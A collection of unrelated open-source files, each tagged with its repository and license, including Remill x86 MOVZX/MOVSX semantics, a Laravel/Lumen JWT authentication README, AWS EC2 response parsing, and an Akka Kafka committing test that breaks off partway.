return memory;
}
} // namespace
DEF_ISEL(MOVZX_GPRv_MEMb_16) = MOVZX<R16W, M8>;
DEF_ISEL(MOVZX_GPRv_MEMb_32) = MOVZX<R32W, M8>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMb_64) = MOVZX<R64W, M8>;)
DEF_ISEL(MOVZX_GPRv_GPR8_16) = MOVZX<R16W, R8>;
DEF_ISEL(MOVZX_GPRv_GPR8_32) = MOVZX<R32W, R8>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR8_64) = MOVZX<R64W, R8>;)
DEF_ISEL(MOVZX_GPRv_MEMw_32) = MOVZX<R32W, M16>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMw_64) = MOVZX<R64W, M16>;)
DEF_ISEL(MOVZX_GPRv_GPR16_32) = MOVZX<R32W, R16>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR16_64) = MOVZX<R64W, R16>;)
DEF_ISEL(MOVSX_GPRv_MEMb_16) = MOVSX<R16W, M8, int16_t>;
DEF_ISEL(MOVSX_GPRv_MEMb_32) = MOVSX<R32W, M8, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMb_64) = MOVSX<R64W, M8, int64_t>;)
DEF_ISEL(MOVSX_GPRv_GPR8_16) = MOVSX<R16W, R8, int16_t>;
DEF_ISEL(MOVSX_GPRv_GPR8_32) = MOVSX<R32W, R8, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR8_64) = MOVSX<R64W, R8, int64_t>;)
DEF_ISEL(MOVSX_GPRv_MEMw_32) = MOVSX<R32W, M16, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMw_64) = MOVSX<R64W, M16, int64_t>;)
DEF_ISEL(MOVSX_GPRv_GPR16_32) = MOVSX<R32W, R16, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR16_64) = MOVSX<R64W, R16, int64_t>;)
DEF_ISEL(MOVSXD_GPRv_GPRz_16) = MOVSX<R32W, R16, int32_t>;
DEF_ISEL(MOVSXD_GPRv_GPRz_32) = MOVSX<R32W, R32, int32_t>;
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_32) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_32) = MOVSX<R64W, R32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_64) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMz_64) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_64) = MOVSX<R64W, R32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPRz_64) = MOVSX<R64W, R32, int64_t>;)
#if HAS_FEATURE_AVX512
namespace {
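// The masked VPMOVSX helpers below first clear the destination vector and then
// sign-extend only the source lanes whose mask bit is set; lanes with a clear
// mask bit are written as zero. In other words, only EVEX zeroing-masking
// behavior is modeled here.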
template <typename D, typename K, typename S>
DEF_SEM(VPMOVSXBQ_MASKmskw_SIMD128, D dst, K k1, S src) {
auto src_vec = SReadV8(src);
auto dst_vec = SClearV64(SReadV64(dst));
auto k_vec = Read(k1);
for (auto i = 0u; i < 2u; i++) {
if (READBIT(k_vec, i) == 0) {
dst_vec = SInsertV64(dst_vec, i, 0);
} else {
auto v = SExtTo<int64_t>(SExtractV8(src_vec, i));
dst_vec = SInsertV64(dst_vec, i, v);
}
}
SWriteV64(dst, dst_vec);
return memory;
}
template <typename D, typename K, typename S>
DEF_SEM(VPMOVSXWD_MASKmskw_SIMD128, D dst, K k1, S src) {
auto src_vec = SReadV16(src);
auto dst_vec = SClearV32(SReadV32(dst));
auto k_vec = Read(k1);
for (auto i = 0u; i < 4u; i++) {
if (READBIT(k_vec, i) == 0) {
dst_vec = SInsertV32(dst_vec, i, 0);
} else {
auto v = SExtTo<int32_t>(SExtractV16(src_vec, i));
dst_vec = SInsertV32(dst_vec, i, v);
}
}
SWriteV32(dst, dst_vec);
return memory;
}
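// Move the low 16 bits of a mask register, GPR, or memory operand,
// zero-extending into wider destinations.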
template <typename S1, typename S2>
DEF_SEM(KMOVW, S1 dst, S2 src) {
WriteZExt(dst, UInt16(Read(src)));
return memory;
}
} // namespace
DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, MV16>;
DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, V128>;
DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, MV64>;
DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, V128>;
DEF_ISEL(KMOVW_MASKmskw_MASKu16_AVX512) = KMOVW<R64W, R64>;
DEF_ISEL(KMOVW_GPR32u32_MASKmskw_AVX512) = KMOVW<R32W, R64>;
DEF_ISEL(KMOVW_MASKmskw_GPR32u32_AVX512) = KMOVW<R64W, R32>;
DEF_ISEL(KMOVW_MASKmskw_MEMu16_AVX512) = KMOVW<R64W, M16>;
DEF_ISEL(KMOVW_MEMu16_MASKmskw_AVX512) = KMOVW<M16W, R64>;
#endif // HAS_FEATURE_AVX512
| trailofbits/remill | lib/Arch/X86/Semantics/DATAXFER.cpp | C++ | apache-2.0 | 75,427 |
# Bihai stricta (Huber) Griggs SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Liliopsida/Zingiberales/Heliconiaceae/Heliconia/Heliconia stricta/ Syn. Bihai stricta/README.md | Markdown | apache-2.0 | 185 |
/**
* Copyright 2011-2017 Asakusa Framework Team.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.asakusafw.compiler.batch;
import com.asakusafw.compiler.batch.batch.JobFlow1;
import com.asakusafw.vocabulary.batch.Batch;
import com.asakusafw.vocabulary.batch.BatchDescription;
/**
* A batch class which is not public.
*/
@Batch(name = "testing")
class NotPublic extends BatchDescription {
@Override
protected void describe() {
run(JobFlow1.class).soon();
}
}
| cocoatomo/asakusafw | mapreduce/compiler/core/src/test/java/com/asakusafw/compiler/batch/NotPublic.java | Java | apache-2.0 | 1,012 |
# Attention!!!
The main purpose of this library is to share how JWT works under the hood. I am currently busy with my company's Android project and have no time to maintain this package for now (its compatibility with Laravel 5.4 is poor), and its stability has not been fully verified, so I do not recommend using it in production.
I recommend https://github.com/tymondesigns/jwt-auth instead :). If there is anything about JWT you are unsure of, feel free to open an issue and we can discuss it together.
If you want to learn how JWT is implemented, I believe this project will be of some help :). It is best read alongside the column at https://zhuanlan.zhihu.com/p/22531819
# jwt-auth [](https://badge.fury.io/ph/lsxiao%2Fjwt-auth)
A JSON Web Token authentication package for Laravel/Lumen
## TODO
- [ ] More thorough unit tests
- [ ] Command-line generation of HMAC/RSA keys
## Adding jwt-auth to your project
```bash
composer require "lsxiao/jwt-auth"
```
## Usage
### Configuring jwt-auth
#### Laravel
```bash
php artisan vendor:publish
```
The jwt.php configuration file will be copied into the config folder in the project root.
#### Lumen
Create a config folder in the root of your Lumen project and copy the ```jwt.php``` configuration file into it.
```php
<?php
return [
    /*
    |--------------------------------------------------------------------------
    | HMAC signing key
    |--------------------------------------------------------------------------
    |
    | The HMAC key is used to sign tokens with HMAC. It must be set in the
    | .env file.
    |
    */
'secret_key' => env('JWT_SECRET_KEY'),
    /*
    |--------------------------------------------------------------------------
    | RSA signing private key
    |--------------------------------------------------------------------------
    |
    | The RSA private key is used to sign tokens with RSA. It must be set in
    | the .env file.
    |
    */
'private_secret_key' => env('JWT_PRIVATE_SECRET_KEY'),
    /*
    |--------------------------------------------------------------------------
    | RSA signing public key
    |--------------------------------------------------------------------------
    |
    | The RSA public key is used to verify RSA token signatures. It must be
    | set in the .env file.
    |
    */
'public_secret_key' => env('JWT_PUBLIC_SECRET_KEY'),
    /*
    |--------------------------------------------------------------------------
    | Token time-to-live
    |--------------------------------------------------------------------------
    |
    | How long a token stays valid, in minutes. Defaults to one hour.
    |
    */
'ttl' => env('JWT_TTL', 60),
    /*
    |--------------------------------------------------------------------------
    | Token refresh time-to-live
    |--------------------------------------------------------------------------
    |
    | How long after a token has expired it can still be refreshed. Defaults
    | to three weeks.
    |
    */
'refresh_ttl' => env('JWT_REFRESH_TTL', 30240),
    /*
    |--------------------------------------------------------------------------
    | JWT algorithm ID
    |--------------------------------------------------------------------------
    |
    | The hash algorithm used to sign tokens.
    | Symmetric algorithms:
    |     HS256, HS384, HS512
    | Asymmetric algorithms (a public/private key pair is required):
    |     RS256, RS384, RS512
    */
'algorithm_id' => env('JWT_ALGORITHM', \Lsxiao\JWT\Singer\HMAC::DEFAULT_ALGO_ID),
    /*
    |--------------------------------------------------------------------------
    | Token not-before time
    |--------------------------------------------------------------------------
    |
    | A delta in seconds; the token cannot be used before its issue time plus
    | this delta.
    |
    */
    'not_before' => env('JWT_NOT_BEFORE', 0),
    /*
    |--------------------------------------------------------------------------
    | Token refresh count difference limit
    |--------------------------------------------------------------------------
    |
    | The latest refresh count is cached on the server. If the refresh count
    | in a client's token differs from the cached value by more than this
    | limit, the token is judged invalid.
    |
    */
    'refresh_diff_limit' => env('JWT_REFRESH_DIFF_LIMIT', 2),
    /*
    |--------------------------------------------------------------------------
    | Blacklist grace time, in seconds
    |--------------------------------------------------------------------------
    |
    | After each refresh the old token is added to a blacklist, which under
    | high concurrency would invalidate requests still in flight. With a
    | grace time set, a blacklisted token remains valid as long as it is
    | still within the grace period.
    |
    */
'blacklist_grace_time' => env('JWT_BLACK_LIST_GRACE_TIME', 30)
];
```
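For reference, the matching .env entries might look like this sketch (placeholder values; only the keys read by the config above are shown):
```bash
JWT_SECRET_KEY=some-long-random-string
JWT_TTL=60
JWT_REFRESH_TTL=30240
```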
### Configuring auth
#### Laravel
Locate auth.php in the config folder.
#### Lumen
Copy the ```auth.php``` configuration file into the config folder.
Modify it as follows:
```php
<?php
return [
'defaults' => [
'guard' => env('AUTH_GUARD', 'api'),
],
'guards' => [
        'api' => ['driver' => 'jwt'], // this must be 'jwt'; it is backed by JWTGuard
],
'providers' => [
//
],
];
```
### Enabling authentication
Edit bootstrap/app.php and uncomment the auth middleware and the AuthServiceProvider registration, as shown in the sketch below.
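For a default Lumen skeleton, the relevant lines look roughly like this once uncommented (a sketch; adjust the class names to your application):
```php
// bootstrap/app.php
$app->routeMiddleware([
    'auth' => App\Http\Middleware\Authenticate::class,
]);

$app->register(App\Providers\AuthServiceProvider::class);
```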
Then modify the boot method of app/Providers/AuthServiceProvider.php:
```php
public function boot()
{
$this->app->configure('jwt');
$this->app['auth']->viaRequest('api', function ($request) {
$token = \Lsxiao\JWT\Token::fromRequest($request);
if (!empty($token) && $token->isValid()) {
$userid = $token->getClaim('sub')->getValue();
return User::find($userid);
}
});
}
```
### The User class
Make sure the User class implements the \Illuminate\Contracts\Auth\Authenticatable interface; the default User class already does. A sketch of a conforming model follows.
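This is only an illustration (namespaces follow the stock Lumen skeleton; the default class additionally mixes in authorization, which is omitted here):
```php
<?php

namespace App;

use Illuminate\Auth\Authenticatable;
use Illuminate\Contracts\Auth\Authenticatable as AuthenticatableContract;
use Illuminate\Database\Eloquent\Model;

class User extends Model implements AuthenticatableContract
{
    // supplies getAuthIdentifier(), getAuthPassword(), and friends
    use Authenticatable;
}
```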
### Obtaining a token from credentials in a controller
```php
public function login(Request $request)
{
    // look up the user by their credentials and return a token for them
    $credentials = $request->only('email', 'password');
    $user = User::where('email', $credentials['email'])->where('password', $credentials['password'])->first();
$token = \Lsxiao\JWT\Token::fromUser($user);
return response()->json(['token' => $token]);
}
```
### Refreshing the token where needed
In a controller:
```php
public function refresh(Request $request)
{
    // refresh the token carried by the request
    $token = \Lsxiao\JWT\Token::refreshToken($request);
if (!$token) {
throw new TokenInvalidException("refresh failed");
}
return response()->json(['token' => $token]);
}
```
In middleware:
```php
public function handle($request, Closure $next, $guard = null)
{
if ($this->auth->guard($guard)->guest()) {
return response('Unauthorized.', 401);
}
$response = $next($request);
    // refresh the token and reset it in the HTTP response header
\Lsxiao\JWT\Token::refreshToken($request, $response);
return $response;
}
```
### Exceptions to handle
All exceptions extend `Lsxiao\JWT\Exception\BaseJWTException`. It is recommended to handle them in `App\Exceptions\Handler` and return a suitable HTTP status code for each; see the sketch after the list below.
- `Lsxiao\JWT\Exception\SecretKeyException` - the secret key is missing from the .env file, does not meet the requirements, and so on
- `Lsxiao\JWT\Exception\TokenExpiredException` - the token has expired
- `Lsxiao\JWT\Exception\TokenInvalidException` - the token is invalid
- `Lsxiao\JWT\Exception\TokenNotInRequestException` - no token was found in the request query parameters, body, or headers
- `Lsxiao\JWT\Exception\TokenParseException` - the token could not be parsed
- `Lsxiao\JWT\Exception\UnauthorizedException` - the request is unauthorized
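A minimal sketch of such a handler (illustrative only: the render signature follows the stock Laravel/Lumen handler, and the status codes are just an example):
```php
// app/Exceptions/Handler.php
public function render($request, Exception $e)
{
    if ($e instanceof \Lsxiao\JWT\Exception\TokenExpiredException) {
        return response()->json(['error' => 'token expired'], 401);
    }
    if ($e instanceof \Lsxiao\JWT\Exception\BaseJWTException) {
        return response()->json(['error' => $e->getMessage()], 400);
    }
    return parent::render($request, $e);
}
```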
## Changelog
- 1.0.4 (2016-11-21)
    - Fix a bug in the hasBlacklistGraceTimeOrNotInBlacklist function.
- 1.0.3 (2016-11-21)
    - Fix a critical bug where Auth::refreshToken could not refresh successfully.
- 1.0.2 (2016-10-28)
    - Support Laravel by providing a LaravelServiceProvider.
- 1.0.1 (2016-10-28)
    - Fix a bug where the user was fetched without authentication.
- 1.0 (2016-9-29)
    - Initial commit of the basic JWT features.
## Maintainer
Zhihu : [@面条](https://www.zhihu.com/people/lsxiao)
Github : [@lsxiao](https://github.com/lsxiao)
## License
Copyright 2016 lsxiao, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
| lsxiao/jwt-auth | README.md | Markdown | apache-2.0 | 8,595 |
package com.google.api.ads.dfp.jaxws.v201511;
import javax.xml.bind.annotation.XmlEnum;
import javax.xml.bind.annotation.XmlType;
/**
* <p>Java class for CustomTargetingValue.Status.
*
* <p>The following schema fragment specifies the expected content contained within this class.
* <p>
* <pre>
* <simpleType name="CustomTargetingValue.Status">
* <restriction base="{http://www.w3.org/2001/XMLSchema}string">
* <enumeration value="ACTIVE"/>
* <enumeration value="INACTIVE"/>
* <enumeration value="UNKNOWN"/>
* </restriction>
* </simpleType>
* </pre>
*
*/
@XmlType(name = "CustomTargetingValue.Status")
@XmlEnum
public enum CustomTargetingValueStatus {
/**
*
* The object is active.
*
*
*/
ACTIVE,
/**
*
* The object is no longer active.
*
*
*/
INACTIVE,
/**
*
* The value returned if the actual value is not exposed by the requested
* API version.
*
*
*/
UNKNOWN;
public String value() {
return name();
}
public static CustomTargetingValueStatus fromValue(String v) {
return valueOf(v);
}
}
| gawkermedia/googleads-java-lib | modules/dfp_appengine/src/main/java/com/google/api/ads/dfp/jaxws/v201511/CustomTargetingValueStatus.java | Java | apache-2.0 | 1,306 |
/* ###
* IP: GHIDRA
* REVIEWED: YES
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package ghidra.app.plugin.core.compositeeditor;
/**
* Composite Viewer Model component selection change listener interface.
*/
public interface CompositeModelSelectionListener {
/**
* Called to indicate the model's component selection has changed.
*/
void selectionChanged();
}
| NationalSecurityAgency/ghidra | Ghidra/Features/Base/src/main/java/ghidra/app/plugin/core/compositeeditor/CompositeModelSelectionListener.java | Java | apache-2.0 | 904 |
/*
* Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
#include <aws/ec2/model/DescribeInstancesResponse.h>
#include <aws/core/utils/xml/XmlSerializer.h>
#include <aws/core/AmazonWebServiceResult.h>
#include <aws/core/utils/StringUtils.h>
#include <aws/core/utils/logging/LogMacros.h>
#include <utility>
using namespace Aws::EC2::Model;
using namespace Aws::Utils::Xml;
using namespace Aws::Utils::Logging;
using namespace Aws::Utils;
using namespace Aws;
DescribeInstancesResponse::DescribeInstancesResponse()
{
}
DescribeInstancesResponse::DescribeInstancesResponse(const Aws::AmazonWebServiceResult<XmlDocument>& result)
{
*this = result;
}
DescribeInstancesResponse& DescribeInstancesResponse::operator =(const Aws::AmazonWebServiceResult<XmlDocument>& result)
{
const XmlDocument& xmlDocument = result.GetPayload();
XmlNode rootNode = xmlDocument.GetRootElement();
XmlNode resultNode = rootNode;
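  // If the root element is not already DescribeInstancesResponse, look for it
  // as a child before reading the payload fields.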
if (!rootNode.IsNull() && (rootNode.GetName() != "DescribeInstancesResponse"))
{
resultNode = rootNode.FirstChild("DescribeInstancesResponse");
}
if(!resultNode.IsNull())
{
XmlNode reservationsNode = resultNode.FirstChild("reservationSet");
if(!reservationsNode.IsNull())
{
XmlNode reservationsMember = reservationsNode.FirstChild("item");
while(!reservationsMember.IsNull())
{
m_reservations.push_back(reservationsMember);
reservationsMember = reservationsMember.NextNode("item");
}
}
XmlNode nextTokenNode = resultNode.FirstChild("nextToken");
if(!nextTokenNode.IsNull())
{
m_nextToken = StringUtils::Trim(nextTokenNode.GetText().c_str());
}
}
if (!rootNode.IsNull()) {
XmlNode requestIdNode = rootNode.FirstChild("requestId");
if (!requestIdNode.IsNull())
{
m_responseMetadata.SetRequestId(StringUtils::Trim(requestIdNode.GetText().c_str()));
}
AWS_LOGSTREAM_DEBUG("Aws::EC2::Model::DescribeInstancesResponse", "x-amzn-request-id: " << m_responseMetadata.GetRequestId() );
}
return *this;
}
| JoyIfBam5/aws-sdk-cpp | aws-cpp-sdk-ec2/source/model/DescribeInstancesResponse.cpp | C++ | apache-2.0 | 2,558 |
/*
* This file is part of "lunisolar-magma".
*
* (C) Copyright 2014-2022 Lunisolar (http://lunisolar.eu/).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package eu.lunisolar.magma.asserts.func.function.to;
import eu.lunisolar.magma.asserts.func.FunctionalAttest.AssertionsCheck;
import eu.lunisolar.magma.asserts.func.FunctionalAttest.SemiEvaluation;
import eu.lunisolar.magma.func.supp.Be;
import eu.lunisolar.magma.asserts.func.FunctionalAttest;
import eu.lunisolar.magma.asserts.func.FunctionalAttest.*;
import javax.annotation.Nonnull; // NOSONAR
import javax.annotation.Nullable; // NOSONAR
import eu.lunisolar.magma.func.supp.check.Checks; // NOSONAR
import eu.lunisolar.magma.basics.meta.*; // NOSONAR
import eu.lunisolar.magma.basics.meta.functional.*; // NOSONAR
import eu.lunisolar.magma.basics.meta.functional.type.*; // NOSONAR
import eu.lunisolar.magma.basics.meta.functional.domain.*; // NOSONAR
import eu.lunisolar.magma.func.action.*; // NOSONAR
import java.util.function.*;
import eu.lunisolar.magma.func.function.to.*;
import eu.lunisolar.magma.func.action.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.bi.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.obj.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.tri.*; // NOSONAR
import eu.lunisolar.magma.func.function.*; // NOSONAR
import eu.lunisolar.magma.func.function.conversion.*; // NOSONAR
import eu.lunisolar.magma.func.function.from.*; // NOSONAR
import eu.lunisolar.magma.func.function.to.*; // NOSONAR
import eu.lunisolar.magma.func.operator.binary.*; // NOSONAR
import eu.lunisolar.magma.func.operator.ternary.*; // NOSONAR
import eu.lunisolar.magma.func.operator.unary.*; // NOSONAR
import eu.lunisolar.magma.func.predicate.*; // NOSONAR
import eu.lunisolar.magma.func.supplier.*; // NOSONAR
import eu.lunisolar.magma.func.function.to.LToIntBiFunction.*;
/** Assert class for LToIntObj1Obj0Func. */
public final class LToIntObj1Obj0FuncAttest<T2, T1> extends FunctionalAttest.Full<LToIntObj1Obj0FuncAttest<T2, T1>, LToIntObj1Obj0Func<T2, T1>, LBiConsumer<T2, T1>, Checks.CheckInt> {
public LToIntObj1Obj0FuncAttest(LToIntObj1Obj0Func<T2, T1> actual) {
super(actual);
}
@Nonnull
public static <T2, T1> LToIntObj1Obj0FuncAttest<T2, T1> attestToIntObj1Obj0Func(LToIntBiFunction.LToIntObj1Obj0Func<T2, T1> func) {
return new LToIntObj1Obj0FuncAttest(func);
}
@Nonnull
public IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>> doesApplyAsInt(T2 a2, T1 a1) {
return new IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>>(this, () -> String.format("(%s,%s)", a2, a1), (desc, pc) -> {
var func = value();
Checks.check(func).must(Be::notNull, "Actual function is null.");
if (pc != null) {
pc.accept(a2, a1);
}
var result = func.applyAsIntObj1Obj0(a2, a1);
return Checks.attest(result, desc);
}, recurringAssert);
}
}
| lunisolar/magma | magma-asserts/src/main/java/eu/lunisolar/magma/asserts/func/function/to/LToIntObj1Obj0FuncAttest.java | Java | apache-2.0 | 3,567 |
// [[[[INFO>
// Copyright 2015 Epicycle (http://epicycle.org, https://github.com/open-epicycle)
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// For more information check https://github.com/open-epicycle/Epicycle.Input-cs
// ]]]]
using NUnit.Framework;
namespace Epicycle.Input.Keyboard
{
[TestFixture]
public class KeyEventArgsTest
{
[Test]
public void ctor_sets_properties_correctly()
{
var eventArgs = new KeyEventArgs<int, int>(123, KeyEventType.Released, 234);
Assert.That(eventArgs.KeyId, Is.EqualTo(123));
Assert.That(eventArgs.EventType, Is.EqualTo(KeyEventType.Released));
Assert.That(eventArgs.AdditionalData, Is.EqualTo(234));
}
}
}
| open-epicycle/Epicycle.Input-cs | projects/Epicycle.Input_cs-Test/Keyboard/KeyEventArgsTest.cs | C# | apache-2.0 | 1,266 |
/*
* Copyright (C) 2014 - 2016 Softwaremill <http://softwaremill.com>
* Copyright (C) 2016 - 2019 Lightbend Inc. <http://www.lightbend.com>
*/
package akka.kafka.internal
import akka.Done
import akka.actor.ActorSystem
import akka.kafka.ConsumerMessage._
import akka.kafka.{internal, CommitterSettings, ConsumerSettings, Subscriptions}
import akka.kafka.scaladsl.{Committer, Consumer}
import akka.kafka.scaladsl.Consumer.Control
import akka.kafka.tests.scaladsl.LogCapturing
import akka.stream._
import akka.stream.scaladsl._
import akka.stream.testkit.scaladsl.StreamTestKit.assertAllStagesStopped
import akka.stream.testkit.scaladsl.TestSink
import akka.testkit.TestKit
import org.apache.kafka.clients.consumer._
import org.apache.kafka.common.TopicPartition
import org.apache.kafka.common.serialization.StringDeserializer
import org.scalatest.concurrent.ScalaFutures
import org.scalatest.{BeforeAndAfterAll, FlatSpecLike, Matchers}
import scala.jdk.CollectionConverters._
import scala.collection.immutable.Seq
import scala.concurrent.duration._
import scala.concurrent.{Await, Future}
object CommittingWithMockSpec {
type K = String
type V = String
type Record = ConsumerRecord[K, V]
def createMessage(seed: Int): CommittableMessage[K, V] = createMessage(seed, "topic")
def createMessage(seed: Int,
topic: String,
groupId: String = "group1",
metadata: String = ""): CommittableMessage[K, V] = {
val offset = PartitionOffset(GroupTopicPartition(groupId, topic, 1), seed.toLong)
val record = new ConsumerRecord(offset.key.topic, offset.key.partition, offset.offset, seed.toString, seed.toString)
CommittableMessage(record, CommittableOffsetImpl(offset, metadata)(null))
}
def toRecord(msg: CommittableMessage[K, V]): ConsumerRecord[K, V] = msg.record
}
class CommittingWithMockSpec(_system: ActorSystem)
extends TestKit(_system)
with FlatSpecLike
with Matchers
with BeforeAndAfterAll
with ScalaFutures
with LogCapturing {
import CommittingWithMockSpec._
implicit val patience: PatienceConfig = PatienceConfig(15.seconds, 1.second)
def this() = this(ActorSystem())
override def afterAll(): Unit =
shutdown(system)
implicit val m = ActorMaterializer(ActorMaterializerSettings(_system).withFuzzing(true))
implicit val ec = _system.dispatcher
val messages = (1 to 1000).map(createMessage)
def checkMessagesReceiving(msgss: Seq[Seq[CommittableMessage[K, V]]]): Unit = {
val mock = new ConsumerMock[K, V]()
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
probe.request(msgss.map(_.size).sum.toLong)
msgss.foreach(chunk => mock.enqueue(chunk.map(toRecord)))
probe.expectNextN(msgss.flatten)
Await.result(control.shutdown(), remainingOrDefault)
}
def createCommittableSource(mock: Consumer[K, V],
groupId: String = "group1",
topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] =
Consumer.committableSource(
ConsumerSettings
.create(system, new StringDeserializer, new StringDeserializer)
.withGroupId(groupId)
.withConsumerFactory(_ => mock),
Subscriptions.topics(topics)
)
def createSourceWithMetadata(mock: Consumer[K, V],
metadataFromRecord: ConsumerRecord[K, V] => String,
groupId: String = "group1",
topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] =
Consumer.commitWithMetadataSource(
ConsumerSettings
.create(system, new StringDeserializer, new StringDeserializer)
.withGroupId(groupId)
.withCloseTimeout(ConsumerMock.closeTimeout)
.withConsumerFactory(_ => mock),
Subscriptions.topics(topics),
metadataFromRecord
)
it should "commit metadata in message" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock, (rec: ConsumerRecord[K, V]) => rec.offset.toString)
.toMat(TestSink.probe)(Keep.both)
.run()
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
probe.request(100)
val done = probe.expectNext().committableOffset.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val (topicPartition, offsetMeta) = commitLog.calls.head._1.head
topicPartition.topic should ===(msg.record.topic())
topicPartition.partition should ===(msg.record.partition())
// committed offset should be the next message the application will consume, i.e. +1
offsetMeta.offset should ===(msg.record.offset() + 1)
offsetMeta.metadata should ===(msg.record.offset.toString)
//emulate commit
commitLog.calls.head match {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "call commitAsync for commit message and then complete future" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
probe.request(100)
val done = probe.expectNext().committableOffset.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val (topicPartition, offsetMeta) = commitLog.calls.head._1.head
topicPartition.topic should ===(msg.record.topic())
topicPartition.partition should ===(msg.record.partition())
// committed offset should be the next message the application will consume, i.e. +1
offsetMeta.offset should ===(msg.record.offset() + 1)
//emulate commit
commitLog.calls.head match {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "fail future in case of commit fail" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
probe.request(100)
val done = probe.expectNext().committableOffset.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
//emulate commit failure
val failure = new Exception()
